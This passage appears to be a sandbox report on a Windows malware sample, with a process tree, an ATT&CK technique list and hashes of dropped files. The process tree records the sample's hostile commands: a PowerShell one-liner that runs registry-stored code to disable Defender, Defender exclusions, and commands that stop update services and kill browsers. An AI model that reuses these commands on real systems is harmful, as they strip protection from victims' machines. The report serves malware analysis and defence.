        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:7624
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:7892
      - C:\Users\Admin\AppData\Local\Temp\10223490101\7d729d906e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223490101\7d729d906e.exe"
        6⤵
        
        PID:736
      - C:\Users\Admin\AppData\Local\Temp\10223500101\f74fcebdef.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223500101\f74fcebdef.exe"
        6⤵
        
        PID:7460

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1868

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:4596

C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:4464

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1724
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6524 -ip 6524
1⤵
PID:6464

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5416

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6612

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3948

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5600

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4004

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4340

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6376

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6764

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2836

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6704

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1372
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" qc windefend
  2⤵
  - Launches sc.exe
  PID:6616
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  2⤵
  PID:6276
- C:\Windows\system32\whoami.exe
  "C:\Windows\system32\whoami.exe" /groups
  2⤵
  PID:2324
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" stop windefend
  2⤵
  PID:6380
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
  2⤵
  - Launches sc.exe
  PID:2872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1672
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" qc windefend
  2⤵
  - Launches sc.exe
  PID:1592
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  2⤵
  PID:6580
- C:\Windows\system32\whoami.exe
  "C:\Windows\system32\whoami.exe" /groups
  2⤵
  PID:3304
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" stop windefend
  2⤵
  PID:6368
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
  2⤵
  - Launches sc.exe
  PID:3040

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:1152

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4392

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5544

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6096

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:3668

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4680

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6548

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6304

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:5796

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:6564

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:3216

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3608

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4752

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5184 -ip 5184
1⤵
PID:12232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6920 -ip 6920
1⤵
PID:16728

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:17044

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:6744

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6564

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:544

C:\ProgramData\WindowsServices\WindowsAutHost
C:\ProgramData\WindowsServices\WindowsAutHost
1⤵
PID:12668
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:13248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:14284
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:14420
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:14292
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:14388
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:14444
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:14484
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:14524
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:14564
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:14572
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:14580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:14588
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:14600
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:14636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3200
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:14740

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:12696

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:5388

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:7712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\2nop8qimgv.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\eua1n\gvk6xt

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\eua1n\lxb1vk

Filesize
228KB

MD5
ee463e048e56b687d02521cd12788e2c

SHA1
ee26598f8e8643df84711960e66a20ecbc6321b8

SHA256
3a07b3003758a79a574aa73032076567870389751f2a959537257070da3a10d8

SHA512
42b395bf6bd97da800385b9296b63a4b0edd7b3b50dc92f19e61a89235a42d37d204359b57d506e6b25ab95f16625cce035ed3b55ef2d54951c82332498dab0f

Download Submit
C:\ProgramData\gdtrimy5xl.exe

Filesize
366KB

MD5
6c057d56aaf85d273e5bf60c1321673e

SHA1
8d1d79a0dd9a35fa6f41ab10c490cd32e0025f6a

SHA256
a294bf481aa526fb74cf00c400c68cb9c79da511840d455adaa8900cf8878a94

SHA512
ade76e0c616e59769798d617d8682b3c1d2233baed96d8c37dba6c88eda12574a0e795814e278ce90aaa01484875c96674f8d117c951c9e40afab9b63aebbb25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
414B

MD5
43d6558ab9e032769862f4b7211ed5be

SHA1
9c596d9166ea8fe74097b085f22fe833ef333a96

SHA256
55d81884d5bcf055e3792e41bdc425bea8f79c7a6dcccdf6cbaf031dbf3ee9b7

SHA512
50175249d810b7f04cdbf7a540f5c5898e7b2ac97a040e978619f7074c472302b70e59898eb0046737c5cbf2012934ce6827df9e2b8299b8d73a31b9b695557b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
d2eaaa787c082bb1c3a61a79a37ea64f

SHA1
46956ae210ee402bf6bc394fb9773e1db864711a

SHA256
3adf7cf091ef5ea5ec6bb0aea831ca849605b8369a18b3134caa396030aa9d03

SHA512
e5b758c5cbd3637cc404060772852cb49e0c8028d427a71f427486adb937e67679568e0e930571bddcc7760a0263512599187014cc742d58a30c920e523337c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
7b0736a36bad51260e5db322736df2e9

SHA1
30af14ed09d3f769230d67f51e0adb955833673e

SHA256
0d2adfd06d505b9020c292d30597083d808bfd90ddc0fe173def5db96832a087

SHA512
caabdc6a8601b93f3c082e6506b3c9efe2242b90e92e86306dc0bd4857d33343ba395325fabb21f5db562d3e3932f52f77de547f379072d0154efd5f1b1cdeb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index

Filesize
744B

MD5
af14cec39c1e351d678390b85fa58607

SHA1
77a43894ceed6fa5d69382c8a06a816d30b8d7bf

SHA256
e766efabc3d49fb3913e767b5601f38a8dbba11a4dfd9be78ec9f6e1ad4625e8

SHA512
38ed625f87c166761c718dd2845b9f1c6a596b580488c14633ce1f9871b7d7776dbbb9efc04832ec24355c536ddf000f36e11b0756e763fb50f60056078932c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index~RFe58b7d2.TMP

Filesize
744B

MD5
6eb47a2557b32af884da0e532721addb

SHA1
32cf422197af9de691ec29ecee69d47e589af890

SHA256
1cc80d4d9f5265d18cc94d84eed9136518fc694ded79d282949550150db7663c

SHA512
039e0e8ae3a5a5a9b486306cdbc7791eb98bff4dd6ab5a24cf605cb51e46629e56128a61218fc8f96b9e0e0cf2f47b3e516537efd51f619729bcab2ae6ad9d6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
065a9ebc743678d692e09b5ee004a2df

SHA1
167cfb62edb35aaf4c52ceafc792558c620389b4

SHA256
11aeec3f858fccf869b2d81dd44e0d378cfcfc4ea91f36d8b02b15025cb477a0

SHA512
da67d1c0ea2641c44e87244ac37ded3e8e8701d670c91e3671f63af3b37fe682244d2fadda8499e0317dfbc80d77c4ae19fff54f588bafbbcf968d40c8a78160

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1YAN2J8O\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NM148MSQ\soft[1]

Filesize
799KB

MD5
509ce87fd3f402d404985067ef4cbb13

SHA1
731fab3c03d9f6874876d9793a0983b25c714781

SHA256
bd1866fa424560cd534e5f112553e4ea2729367fb800e1f6ab018eba4d66dadf

SHA512
6c1c3ff01c599033a3b755168bce57cf29c85e90c0b5a21cadf9d6fcc51fae482be46b4de03860741b1eea8d4bb74e2d07b35a0edeb78c1001c78265fb62db40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
31094f8ecff5dcfbe9426f940ad5e1f6

SHA1
b6fab7da7b5aa23092f21b4490ca29d1a971d9f0

SHA256
ab11d465dca4fd71ff600194bd8a39c446d64be8c1cbf199a20ad8fc15c6746c

SHA512
b53e321d345852898bdcc8c131367f6b1ada4ee7a9b02b24aac1ba4d819a2fb32f39728012535c3e2a6f5e470ae8c8b6e968dabb0c50eab09ded0ec373a2ab9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e78e1b97b8e7b9d39c3f161417e49b7c

SHA1
526a7876e89b584282b063e4a1ff7fb82c7d1da5

SHA256
60bf5c593e71db631e94359d919493307ef675e6f326a308fd462fc7267c18f5

SHA512
164b4d76f901cff829b80157a8e1d5e63b426f63b10c64575565199779054d1f270f004eb72dedb8de2525346b39cb398b91fe7b55cc0e52f4fd9f2d218c708e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\353G37J3\microsoft.windows[1].xml

Filesize
97B

MD5
63d1ba8b927cf7c44bf1ca93178f3ed4

SHA1
4274365081b092a46a30c8119cba9c09e4240a07

SHA256
98a9dd34f3efcd593e58cc4eff69dfa97643904595d1598d49b81c896c4d2bcd

SHA512
47f0fd2220adcd037f6afb273ee8bb4f6f9de39842767dfb0db71d731d1b12b0cca4ea6e770b837eb6af645933f3a609bbb1e2f5cfe20b90e41f375414d06ff7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133865175133413329.txt

Filesize
87KB

MD5
0e79bc715d1793a0c42d35881e6024a8

SHA1
db3bd423715dc1a24f518036a26850f79598a3ca

SHA256
b6f5f4dbbd496e50e0d14a499fe4cdd86bdcae22717cbabe6166e7ee114a968a

SHA512
52ca0e8c45323997d86be9ba447ae0634c98fd6b670a31fe521f414447b0cebcf84fec75957bde1d922da45ea5329f13abc78d44dd7432f0c5de15d54215def8

Download Submit
C:\Users\Admin\AppData\Local\Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE

Filesize
2.1MB

MD5
95be7d356933ae5d8ca2f125be8d82a8

SHA1
890fd44a54ce6f7ae5f9e67726c9927e93e94e81

SHA256
cc982efcdc96007a7ca264376689544ef9b505c434b2722844d743050ce9ea9e

SHA512
58fd026a43aaec1cc73a2e86727ccb5f4f91f352d7d982008c088c91968b3f820e0dc8df043b9497f5722b33c7ab6e427fdbcbfa0c83a6f307405ae074044c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip

Filesize
669KB

MD5
963a766b3b8d33b4f0471c74b9cbec7c

SHA1
e342e54e02d430c2c5413d85d775c696fe1289f8

SHA256
7986641712e76a0b74fe66dce29d9bd7d3f37cf9f70e91424fa38d51a2297bba

SHA512
cc75571ca52a54471dc43359d7ab984898c90f634c73a24d32a7bd9ac632763b679a876e87b292cb33327eac50640d0b6383473f669a8035a50f048a34ef8b38

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe

Filesize
851KB

MD5
02db870cb6846f2f5500fd5fec77c5ba

SHA1
b00913ccceb022bf2e8dd0056b44b2dc68f4036c

SHA256
8b28b641e44511ab3b350564d657f8b33d6eff43b9d883ea3ec99ab96dc86710

SHA512
015b1095fb9f123103e6ac81b53c6bfbcdeba366e29065dcdee1e1e13293a1f9a44fe8d10770af188899697a5e3d9bc1a1ea82b1c94a7192bc99e2c995b11d82

Download Submit
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

Filesize
19.4MB

MD5
f70d82388840543cad588967897e5802

SHA1
cd21b0b36071397032a181d770acd811fd593e6e

SHA256
1be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35

SHA512
3d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe

Filesize
445KB

MD5
ab09d0db97f3518a25cd4e6290862da7

SHA1
9e4d882e41b0ac86be4105f8aa9b3c1526dafbe0

SHA256
fc8cbb7809af3ab0b5f7ed07919bbd6c66366d1ed51681a8b91783ad8dafbb3d

SHA512
46553192614fd127640fead944f6e631a30d2ebae75262b5e1ff17742ef2c50bcea229bbc74800a9f1c854369012cd1645368733f1d09e8ba8b43c7819a7314a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe

Filesize
757KB

MD5
5b63b3a5d527ed5259811d2d46ecca58

SHA1
8382155b7c465dd216ea7f31fa10c7115f93f1c5

SHA256
17a3259df1b54d390acd9b338e0afd6a3ed926f294e494e07512efdb99bb99fb

SHA512
ff190800a6b7c38c5443f2c4a147b1feb85fff72cdccb954b2c21b89af75fd40e197baffc2b0626056a0e027a7a7353f319c585b58f9ee98ab824fdbaf7271b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe

Filesize
23KB

MD5
1f93cc8da3ab43a6a2aa45e8aa38c0f8

SHA1
5a89e3c7efe0d4db670f47e471290d0b6d9fcfd5

SHA256
d7f94c1a0afdd5c8a5878629b865588de4d6fa0f194021c955feb7ed9f4bd10c

SHA512
cb95c12d9a2eb7d984e67669950e795d3ee090743a8db039a0389908187c78fc6ff7277f7952949001fe2f98ad5006243949bb054442808c680c6cf621e35c01

Download Submit
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

Filesize
264KB

MD5
b6fff0854975fdd3a69fd2442672de42

SHA1
301241ad8d04a29bec6d43e00b605df4317f406a

SHA256
